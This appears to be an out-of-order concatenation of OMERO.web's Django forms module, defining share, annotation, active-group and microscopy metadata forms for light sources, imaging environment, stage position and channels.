}
),
label="Type",
initial=lightSource.getLightSourceType().value,
required=False,
)
else:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "type", options=True
)
}
),
label="Type",
required=False,
)
set_widget_attrs(self.fields["lstype"])
except Exception:
self.fields["lstype"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Type",
required=False,
)
set_widget_attrs(self.fields["lstype"])
# Pump (laser only)
try:
# Will throw exception for non-Laser lightsources.
pump = lightSource.getPump()
pumpType = pump.OMERO_CLASS # E.g. 'Arc'
pumpModel = pump.getModel()
pumpValue = "%s: %s" % (pumpType, pumpModel)
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial=pumpValue,
required=False,
)
except Exception:
# Not a Laser - don't show Pump
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["pump"])
# Medium
try:
if lightSource.getLaserMedium() is not None:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "medium", options=True
)
}
),
initial=lightSource.getLaserMedium().value,
label="Medium",
required=False,
)
else:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "medium", options=True
)
}
),
label="Medium",
required=False,
)
set_widget_attrs(self.fields["lmedium"])
except Exception:
self.fields["lmedium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Medium",
required=False,
)
set_widget_attrs(self.fields["lmedium"])
# Wavelength
try:
if (
lightSourceSettings is not None
and lightSourceSettings.wavelength is not None
):
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "wavelength"),
}
),
initial=lightSourceSettings.wavelength.getValue(),
label=(
"Wavelength (%s)" % lightSourceSettings.wavelength.getSymbol()
),
required=False,
)
elif lightSource.wavelength is not None:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "wavelength"),
}
),
initial=lightSource.wavelength.getValue(),
label=("Wavelength (%s)" % lightSource.wavelength.getSymbol()),
required=False,
)
else:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "wavelength"),
}
),
required=False,
)
set_widget_attrs(self.fields["wavelength"])
except Exception:
self.fields["wavelength"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["wavelength"])
# FrequencyMultiplication
try:
if lightSource.frequencyMultiplication is not None:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
lightSource.id, "frequencyMultiplication"
),
}
),
initial=lightSource.frequencyMultiplication,
label="Frequency Multiplication",
required=False,
)
else:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
lightSource.id, "frequencyMultiplication"
),
}
),
label="Frequency Multiplication",
required=False,
)
set_widget_attrs(self.fields["frequencyMultiplication"])
except Exception:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Frequency Multiplication",
required=False,
)
set_widget_attrs(self.fields["frequencyMultiplication"])
# Tuneable
try:
if lightSource.tuneable is not None:
self.fields["tuneable"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "tuneable", options=True
)
}
),
initial=lightSource.tuneable,
required=False,
)
else:
self.fields["tuneable"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "tuneable", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["tuneable"])
except Exception:
self.fields["tuneable"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["tuneable"])
# Pulse
try:
if lightSource.pulse is not None:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "pulse", options=True
)
}
),
initial=lightSource.pulse,
required=False,
)
else:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "pulse", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["pulse"])
except Exception:
self.fields["pulse"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["pulse"])
# Repetition Rate
try:
if lightSource.repetitionRate is not None:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "repetitionRate"),
}
),
initial=lightSource.repetitionRate.getValue(),
label=(
"Repetition rate (%s)" % lightSource.repetitionRate.getSymbol()
),
required=False,
)
else:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "repetitionRate"),
}
),
label="Repetition rate",
required=False,
)
set_widget_attrs(self.fields["repetitionRate"])
except Exception:
self.fields["repetitionRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Repetition rate",
required=False,
)
set_widget_attrs(self.fields["repetitionRate"])
# Pockel Cell
try:
if lightSource.pockelCell is not None:
self.fields["pockelCell"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "pockelCell", options=True
)
}
),
initial=lightSource.pockelCell,
label="Pockel Cell",
required=False,
)
else:
self.fields["pockelCell"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "pockelCell", options=True
)
}
),
label="Pockel Cell",
required=False,
)
set_widget_attrs(self.fields["pockelCell"])
except Exception:
self.fields["pockelCell"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel Cell",
required=False,
)
set_widget_attrs(self.fields["pockelCell"])
# Attenuation
if (
lightSourceSettings is not None
and lightSourceSettings.attenuation is not None
):
self.fields["attenuation"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
lightSourceSettings.id, "attenuation"
),
}
),
initial=formatPercentFraction(lightSourceSettings.attenuation),
label="Attenuation (%)",
required=False,
)
else:
self.fields["attenuation"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["attenuation"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"power",
"lstype",
"pump",
"lmedium",
"wavelength",
"frequencyMultiplication",
"tuneable",
"pulse",
"repetitionRate",
"pockelCell",
"attenuation",
]
class MetadataEnvironmentForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataEnvironmentForm, self).__init__(*args, **kwargs)
# Imaging environment
imagingEnv = kwargs["initial"]["image"].getImagingEnvironment()
# Temperature
try:
if imagingEnv.temperature is not None:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "temperature"
),
}
),
initial=imagingEnv.temperature.getValue(),
label=("Temperature (%s)" % imagingEnv.temperature.getSymbol()),
required=False,
)
else:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "temperature"
),
}
),
required=False,
)
set_widget_attrs(self.fields["temperature"])
except Exception:
self.fields["temperature"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["temperature"])
# Air Pressure
try:
if imagingEnv.airPressure is not None:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "airPressure"
),
}
),
initial=imagingEnv.airPressure.getValue(),
label=("Air Pressure (%s)" % imagingEnv.airPressure.getSymbol()),
required=False,
)
else:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "airPressure"
),
}
),
label="Air Pressure",
required=False,
)
set_widget_attrs(self.fields["airPressure"])
except Exception:
self.fields["airPressure"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
label="Air Pressure",
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["airPressure"])
# Humidity
try:
if imagingEnv.humidity is not None:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "humidity"
),
}
),
initial=imagingEnv.humidity,
required=False,
)
else:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "humidity"
),
}
),
required=False,
)
set_widget_attrs(self.fields["humidity"])
except Exception:
self.fields["humidity"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["humidity"])
# CO2 percent
try:
if imagingEnv.co2percent is not None:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "co2percent"
),
}
),
initial=imagingEnv.co2percent,
label="CO2 (%)",
required=False,
)
else:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "co2percent"
),
}
),
label="CO2 (%)",
required=False,
)
set_widget_attrs(self.fields["co2percent"])
except Exception:
self.fields["co2percent"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="CO2 (%)",
required=False,
)
set_widget_attrs(self.fields["co2percent"])
self.fields.keyOrder = ["airPressure", "co2percent", "humidity", "temperature"]
class MetadataStageLabelForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataStageLabelForm, self).__init__(*args, **kwargs)
# Stage label
# Position x
try:
if kwargs["initial"]["image"].getStageLabel() is not None:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positionx"
),
}
),
initial=kwargs["initial"]["image"].getStageLabel().positionx,
label="Position X",
required=False,
)
else:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positionx"
),
}
),
label="Position X",
required=False,
)
set_widget_attrs(self.fields["positionx"])
except Exception:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position X",
required=False,
)
set_widget_attrs(self.fields["positionx"])
# Position y
try:
if kwargs["initial"]["image"].getStageLabel() is not None:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positiony"
),
}
),
initial=kwargs["initial"]["image"].getStageLabel().positiony,
label="Position Y",
required=False,
)
else:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positiony"
),
}
),
label="Position Y",
required=False,
)
set_widget_attrs(self.fields["positiony"])
except Exception:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Y",
required=False,
)
set_widget_attrs(self.fields["positionx"])
# Position z
try:
if kwargs["initial"]["image"].getStageLabel() is not None:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positionz"
),
}
),
initial=kwargs["initial"]["image"].getStageLabel().positionz,
label="Position Z",
required=False,
)
else:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["image"].id, "positionz"
),
}
),
label="Position Z",
required=False,
)
set_widget_attrs(self.fields["positionz"])
except Exception:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Z",
required=False,
)
set_widget_attrs(self.fields["positionz"])
self.fields.keyOrder = ["positionx", "positiony", "positionz"]
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
#
# Copyright (c) 2008-2015 University of Dundee.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: Aleksandra Tarkowska <A(dot)Tarkowska(at)dundee(dot)ac(dot)uk>, 2008.
#
# Version: 1.0
#
import datetime
import time
import logging
from django.conf import settings
from django import forms
from django.forms.formsets import formset_factory
from django.core.urlresolvers import reverse
from omeroweb.custom_forms import NonASCIIForm
from .custom_forms import MetadataModelChoiceField
from .custom_forms import AnnotationModelMultipleChoiceField
from .custom_forms import ObjectModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import ExperimenterModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelChoiceField
from omeroweb.webclient.webclient_utils import formatPercentFraction
logger = logging.getLogger(__name__)
##################################################################
# Static values
# TODO: change to reverse
help_button = "%swebgateway/img/help16.png" % settings.STATIC_URL
help_enable = (
'<span class="tooltip" title="Enable/Disable: This option'
' allows the owner to keep the access control of the share.">'
'<img src="%s" /></span>'
) % help_button
help_expire = (
'<span class="tooltip" title="Expiry date: This date defines'
" when the share will stop being available. Date format:"
' YYYY-MM-DD."><img src="%s" /></span>'
) % help_button
#################################################################
# Non-model Form
class GlobalSearchForm(NonASCIIForm):
search_query = forms.CharField(widget=forms.TextInput(attrs={"size": 25}))
class ShareForm(NonASCIIForm):
def __init__(self, *args, **kwargs):
super(ShareForm, self).__init__(*args, **kwargs)
try:
if kwargs["initial"]["shareMembers"]:
pass
self.fields["members"] = ExperimenterModelMultipleChoiceField(
queryset=kwargs["initial"]["experimenters"],
initial=kwargs["initial"]["shareMembers"],
widget=forms.SelectMultiple(attrs={"size": 28}),
)
except Exception:
self.fields["members"] = ExperimenterModelMultipleChoiceField(
queryset=kwargs["initial"]["experimenters"],
widget=forms.SelectMultiple(attrs={"size": 28}),
)
self.fields.keyOrder = [
"message",
"expiration",
"enable",
"members",
] # , 'guests']
message = forms.CharField(widget=forms.Textarea(attrs={"rows": 5, "cols": 50}))
expiration = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 10}),
label="Expiry date",
help_text=help_expire,
required=False,
)
enable = forms.BooleanField(required=False, help_text=help_enable)
# guests = MultiEmailField(required=False,
# widget=forms.TextInput(attrs={'size':75}))
def clean_expiration(self):
if (
self.cleaned_data["expiration"] is not None
and len(self.cleaned_data["expiration"]) < 1
):
return None
if self.cleaned_data["expiration"] is not None:
d = str(self.cleaned_data["expiration"]).rsplit("-")
try:
date = datetime.datetime.strptime(
("%s-%s-%s" % (d[0], d[1], d[2])), "%Y-%m-%d"
)
except Exception:
raise forms.ValidationError("Date is in the wrong format. YY-MM-DD")
if time.mktime(date.timetuple()) <= time.time():
raise forms.ValidationError("Expiry date must be in the future.")
return self.cleaned_data["expiration"]
class ContainerForm(NonASCIIForm):
name = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
description = forms.CharField(
widget=forms.Textarea(attrs={"rows": 2, "cols": 49}), required=False
)
owner = forms.CharField(widget=forms.HiddenInput, required=False)
class ContainerNameForm(NonASCIIForm):
name = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
class ContainerDescriptionForm(NonASCIIForm):
description = forms.CharField(
widget=forms.Textarea(attrs={"rows": 3, "cols": 39}), required=False
)
class BaseAnnotationForm(NonASCIIForm):
"""
This is the superclass of the various forms used for annotating single or
multiple objects.
All these forms use hidden fields to specify the object(s) currently being
annotated.
"""
def __init__(self, *args, **kwargs):
super(BaseAnnotationForm, self).__init__(*args, **kwargs)
images = "images" in kwargs["initial"] and kwargs["initial"]["images"] or list()
if len(images) > 0:
try:
self.fields["image"] = ObjectModelMultipleChoiceField(
queryset=images,
initial=kwargs["initial"]["selected"]["images"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["image"] = ObjectModelMultipleChoiceField(
queryset=images,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
datasets = (
"datasets" in kwargs["initial"] and kwargs["initial"]["datasets"] or list()
)
if len(datasets) > 0:
try:
self.fields["dataset"] = ObjectModelMultipleChoiceField(
queryset=datasets,
initial=kwargs["initial"]["selected"]["datasets"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["dataset"] = ObjectModelMultipleChoiceField(
queryset=datasets,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
projects = (
"projects" in kwargs["initial"] and kwargs["initial"]["projects"] or list()
)
if len(projects) > 0:
try:
self.fields["project"] = ObjectModelMultipleChoiceField(
queryset=projects,
initial=kwargs["initial"]["selected"]["projects"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["project"] = ObjectModelMultipleChoiceField(
queryset=projects,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
screens = (
"screens" in kwargs["initial"] and kwargs["initial"]["screens"] or list()
)
if len(screens) > 0:
try:
self.fields["screen"] = ObjectModelMultipleChoiceField(
queryset=screens,
initial=kwargs["initial"]["selected"]["screens"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["screen"] = ObjectModelMultipleChoiceField(
queryset=screens,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
plates = "plates" in kwargs["initial"] and kwargs["initial"]["plates"] or list()
if len(plates) > 0:
try:
self.fields["plate"] = ObjectModelMultipleChoiceField(
queryset=plates,
initial=kwargs["initial"]["selected"]["plates"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["plate"] = ObjectModelMultipleChoiceField(
queryset=plates,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
acquisitions = (
"acquisitions" in kwargs["initial"]
and kwargs["initial"]["acquisitions"]
or list()
)
if len(acquisitions) > 0:
try:
self.fields["acquisition"] = ObjectModelMultipleChoiceField(
queryset=acquisitions,
initial=kwargs["initial"]["selected"]["acquisitions"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["acquisition"] = ObjectModelMultipleChoiceField(
queryset=acquisitions,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
wells = "wells" in kwargs["initial"] and kwargs["initial"]["wells"] or list()
if len(wells) > 0:
try:
self.fields["well"] = ObjectModelMultipleChoiceField(
queryset=wells,
initial=kwargs["initial"]["selected"]["wells"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["well"] = ObjectModelMultipleChoiceField(
queryset=wells,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
shares = "shares" in kwargs["initial"] and kwargs["initial"]["shares"] or list()
if len(shares) > 0:
try:
self.fields["share"] = ObjectModelMultipleChoiceField(
queryset=shares,
initial=kwargs["initial"]["selected"]["shares"],
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
except Exception:
self.fields["share"] = ObjectModelMultipleChoiceField(
queryset=shares,
widget=forms.SelectMultiple(attrs={"size": 10}),
required=False,
)
class TagsAnnotationForm(BaseAnnotationForm):
"""
Form for annotating one or more objects with existing Tags or New tags
"""
def __init__(self, *args, **kwargs):
super(TagsAnnotationForm, self).__init__(*args, **kwargs)
tags = forms.CharField(required=False, widget=forms.HiddenInput)
def clean_tags(self):
data = self.cleaned_data["tags"]
if not data:
return []
try:
data = map(int, data.split(","))
except Exception:
raise forms.ValidationError()
return data
class NewTagsAnnotationForm(forms.Form):
""" Helper form for new tags """
tag = forms.CharField(required=True, widget=forms.HiddenInput)
description = forms.CharField(required=False, widget=forms.HiddenInput)
tagset = forms.IntegerField(min_value=1, required=False, widget=forms.HiddenInput)
NewTagsAnnotationFormSet = formset_factory(NewTagsAnnotationForm, extra=0)
class FilesAnnotationForm(BaseAnnotationForm):
def __init__(self, *args, **kwargs):
super(FilesAnnotationForm, self).__init__(*args, **kwargs)
self.fields["files"] = AnnotationModelMultipleChoiceField(
queryset=kwargs["initial"]["files"],
widget=forms.SelectMultiple(attrs={"size": 8, "class": "existing"}),
required=False,
)
annotation_file = forms.FileField(required=False)
class CommentAnnotationForm(BaseAnnotationForm):
comment = forms.CharField(widget=forms.Textarea(attrs={"rows": 2, "cols": 39}))
class ActiveGroupForm(forms.Form):
def __init__(self, *args, **kwargs):
super(ActiveGroupForm, self).__init__(*args, **kwargs)
try:
self.fields["active_group"] = GroupModelChoiceField(
queryset=kwargs["initial"]["mygroups"],
initial=kwargs["initial"]["activeGroup"],
empty_label=None,
widget=forms.Select(
attrs={
"onchange": (
"window.location.href='"
+ reverse(viewname="change_active_group")
+ "?url="
+ kwargs["initial"]["url"]
+ "&active_group='"
"+this.options[this.selectedIndex].value"
)
}
),
)
except Exception:
self.fields["active_group"] = GroupModelChoiceField(
queryset=kwargs["initial"]["mygroups"],
initial=kwargs["initial"]["activeGroup"],
empty_label=None,
widget=forms.Select(
attrs={
"onchange": (
"window.location.href='"
+ reverse(viewname="change_active_group")
+ "?active_group='"
"+this.options[this.selectedIndex].value"
)
}
),
)
self.fields.keyOrder = ["active_group"]
class WellIndexForm(forms.Form):
def __init__(self, *args, **kwargs):
super(WellIndexForm, self).__init__(*args, **kwargs)
rmin, rmax = kwargs["initial"]["range"]
choices = [(str(i), "Field#%i" % (i - rmin + 1)) for i in range(rmin, rmax + 1)]
self.fields["index"] = forms.ChoiceField(
choices=tuple(choices),
widget=forms.Select(
attrs={
"onchange": ("changeField(this.options[this.selectedIndex].value);")
}
),
)
self.fields.keyOrder = ["index"]
###############################
# METADATA FORMS
def save_metadata(obj, name, options=False):
s = "javascript:save_metadata(" + str(obj) + ", '" + name + "', "
if options:
s += "this.options[this.selectedIndex].value);"
else:
s += "this.value);"
return s
def set_widget_attrs(field, set_class=True):
field.widget.attrs["disabled"] = True
if set_class:
field.widget.attrs["class"] = "disabled-metadata"
class MetadataChannelForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataChannelForm, self).__init__(*args, **kwargs)
# Logical channel
# Name
logicalCh = kwargs["initial"]["logicalChannel"]
try:
if logicalCh is not None:
self.fields["name"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": save_metadata(logicalCh.id)}
),
initial=logicalCh.name,
required=False,
)
else:
self.fields["name"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
required=False,
)
set_widget_attrs(self.fields["name"])
except Exception:
self.fields["name"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["name"])
# excitationWave
try:
if logicalCh is not None:
self.fields["excitationWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=kwargs["initial"]["exWave"].getValue(),
label=("Excitation (%s)" % kwargs["initial"]["exWave"].getSymbol()),
required=False,
)
else:
self.fields["excitationWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="Excitation",
required=False,
)
set_widget_attrs(self.fields["excitationWave"])
except Exception:
self.fields["excitationWave"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Excitation",
required=False,
)
set_widget_attrs(self.fields["excitationWave"])
# emissionWave
try:
if logicalCh is not None:
self.fields["emissionWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=kwargs["initial"]["emWave"].getValue(),
label=("Emission (%s)" % kwargs["initial"]["emWave"].getSymbol()),
required=False,
)
else:
self.fields["emissionWave"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="Emission",
required=False,
)
set_widget_attrs(self.fields["emissionWave"])
except Exception:
self.fields["emissionWave"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Emission",
required=False,
)
set_widget_attrs(self.fields["emissionWave"])
# ndFilter
try:
if logicalCh is not None and logicalCh.ndFilter is not None:
self.fields["ndFilter"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=formatPercentFraction(logicalCh.ndFilter),
label="ND filter (%)",
required=False,
)
else:
self.fields["ndFilter"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="ND filter (%)",
required=False,
)
set_widget_attrs(self.fields["ndFilter"], set_class=False)
except Exception:
self.fields["ndFilter"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="ND filter (%)",
required=False,
)
set_widget_attrs(self.fields["ndFilter"], set_class=False)
# pinHoleSize
try:
if logicalCh is not None and logicalCh.pinHoleSize is not None:
self.fields["pinHoleSize"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=logicalCh.pinHoleSize.getValue(),
label=("Pin hole size (%s)" % logicalCh.pinHoleSize.getSymbol()),
required=False,
)
else:
self.fields["pinHoleSize"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
label="Pin hole size",
required=False,
)
set_widget_attrs(self.fields["pinHoleSize"], set_class=False)
except Exception:
self.fields["pinHoleSize"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pin hole size",
required=False,
)
set_widget_attrs(self.fields["pinHoleSize"], set_class=False)
# fluor
try:
if logicalCh is not None:
self.fields["fluor"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
initial=logicalCh.fluor,
required=False,
)
else:
self.fields["fluor"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(logicalCh.id, "name"),
}
),
required=False,
)
set_widget_attrs(self.fields["fluor"], set_class=False)
except Exception:
self.fields["fluor"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["fluor"], set_class=False)
# Illumination
try:
if logicalCh.getIllumination() is not None:
self.fields["illumination"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["illuminations"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "illumination", options=True
)
}
),
initial=logicalCh.getIllumination(),
required=False,
)
else:
self.fields["illumination"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["illuminations"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "illumination", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["illumination"], set_class=False)
except Exception:
self.fields["illumination"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["illumination"], set_class=False)
# contrastMethods
try:
if logicalCh.contrastMethod is not None:
self.fields["contrastMethod"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["contrastMethods"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
logicalCh.id, "contrastMethod", options=True
)
}
),
initial=logicalCh.getContrastMethod(),
label="Contrast method",
required=False,
)
else:
self.fields["contrastMethod"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["contrastMethods"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
